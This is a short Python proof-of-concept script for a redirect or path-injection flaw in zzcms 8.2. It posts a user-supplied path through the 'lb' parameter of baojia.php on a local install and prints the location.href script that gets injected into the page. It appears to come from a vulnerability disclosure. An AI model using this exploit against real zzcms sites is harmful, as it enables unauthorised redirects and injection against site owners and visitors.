If you want to reproduce the vulnerability, you need to deploy the related environment .project download address locally:
http://www.zzcms.net/zx/show-167.htm

import requests
import os
import re

#Please enter the path you want to jump from the current directory.
#For example: if you want to jump to the root directory from http://localhost/zzcms8.2, then you can type in ../
print('Please enter the path you want to jump from the current directory.\nFor example: if you want to jump to the root directory from http://localhost/zzcms8.2, then you can type in ../')
print('input:',end="")
dir_input=input()
def poc():
    payload={'action':'search','lb':dir_input+'?'}
    #This is my local environment
    r=requests.post('http://localhost/zzcms8.2/baojia/baojia.php',data=payload)
    if(r.content):
        print(r.content)
        reg='.*?(<script>location.href=.*keyword=.*</script>)'
        response=r.content.decode('utf-8')
        result=re.match(reg,response)
        print('\nNow the browser executes the following javascript script when loading the page:')
        print(result.group(1))
        print('The first question mark is truncated, so the browser will jump to the http://localhost/zzcms8.2/baojia/baojia.php'+dir_input)
    else:
        print('unknown mistake')
    os.system("pause")
poc()